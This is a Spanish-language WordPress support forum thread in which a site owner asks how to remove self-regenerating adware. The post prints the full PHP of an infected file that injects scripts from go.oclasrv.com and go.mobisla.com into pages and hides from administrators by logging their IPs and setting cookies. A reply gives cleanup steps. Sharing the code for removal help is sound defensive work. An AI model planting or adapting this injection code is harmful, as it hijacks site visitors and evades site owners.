Soporte » Seguridad » Como Eliminar malware ” go.oclasrv.com” por completo

  • Resuelto ajcobo71

    (@ajcobo71)



    Saludos.
    El enlace en referencia es un sitio de pruebas y producción.

    Quiero decirles que llevo un par de meses luchando contra este Adware Malware, virus o como quieran llamarle.
    Se trata de un codgio que se auto regenera mediante 2 archivos .php, este es el sript.

    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>

    Ahora bien sabemos que la vulnerabilidad pudo ser detecta en algun plugin o falsa actualización descargada e instalada en e sitio, pero lo mas cumbre del caso es que todos las web alojadas fueron infectadas.

    Este adware malware o como se le llame es un ladron de trafico, y mientras estas logueado como administrador nunca va a hacerce notar, una vez cierras la sesion y limpias la cache del navegador comienza a trabajar en tu web en cada click de enlace redirige a otros sitios sin relevancia ( porno, casinos, software basura, apuestas y pare de contar)

    Donde se aloja? hasta ahora lo he detecta en la carpeta wp-include y son dos archivos php. wp-feed.php y wp-temp.php, estos archivos por mas que se borran vuelven a regenerarce, al escanear el sitio con Wordfence el los elimina y los pocos minutos estan regenerados nuevamente infectando el sitio.

    Aqui les dejo el codigo de ambos.
    wp-temp.php

    ini_set('display_errors', 0);
    error_reporting(0);
    $wp_auth_key='08b370e35d008b6591dd40b0eec23025';
    
    if ( ! function_exists( 'slider_option' ) ) {  
    
    function slider_option($content){ 
    if(is_single())
    {
    
    $con = '
    ';
    
    $con2 = '
    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script>
    
    ';
    
    $content=$content.$con2;
    }
    return $content;
    } 
    
    function slider_option_footer(){ 
    if(!is_single())
    {
    
    $con2 = '
    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script>
    
    ';
    
    echo $con2;
    }
    } 
    
    function setting_my_first_cookie() {
      setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
      }
    
    if(is_user_logged_in())
    {
    add_action( 'init', 'setting_my_first_cookie',1 );
    }
    
    if( current_user_can('edit_others_pages'))
    {
    
    if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
    {
    $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    }
    
    if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
    {
    $ip.=$_SERVER['REMOTE_ADDR'].'
    ';
    @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
    
    }
    
    }
    
    $ref = $_SERVER['HTTP_REFERER'];
    $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
    foreach ($SE as $source) {
      if (strpos($ref,$source)!==false) {
        setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
    	$sevisitor=true;
      }
    }
    
    if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
    {
    $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
    {
    add_filter('the_content','slider_option');
    add_action('wp_footer','slider_option_footer');
    if($sevisitor==true || isset($_COOKIE['sevisitor']))
    {
    
    }
    
    }
    
    } 
    
    }

    Y el archivo wp-tem.php solo esta escrita la ip desde donde conecto a mi sitios wordpress.

    Como bien lo he mencionado, he hecho todo lo recomendado, nuevas instalaciones de wp, eliminación de y re instalación de plugin, he saneado según lo remendado en este foro de soporte… y nada!! ha Cambie de host, y los problemas continúan.

    Si alguno de vosotros habéis tenido este malware y lo ha solucionado, mucho le sabría agradecer, ya tengo muchos problemas tratando de recuperar el sitio y algunos de clientes y esto me tiene muy agotado.

    Agradeciendo su atención y colaboraciones al caso.

    Quedo atento de vuestros comentarios y agradeciendo la ayuda que me puedan prestar en este caso.

    Un saludo.

    La página con la que necesito ayuda: [accede para ver el enlace]

Viendo 16 respuesta (de 16 total)
  • Recuerda que debes desactivar el cron de WordPress.

    edita tu wp-config.php y agrega la linea para deshabilitar el cron.

    define(‘DISABLE_WP_CRON’, ‘true’);

    luego borra el archivo wp-includes/wp-feed.php y wp-includes/wp-tmp.php

    luego debes ir a todos los functions.php de tus themes y borrar todo el código inyectado.

    wp-content/themes/xxxxx/functions.php son las primera 184 lineas más o menos.

    Ojo debes seguir al pie de la letra, ya que si no se deshabilitar el cron, se te infectara infinitas veces.

    Saludos.

Viendo 16 respuesta (de 16 total)
  • Debes estar registrado para responder a este tema.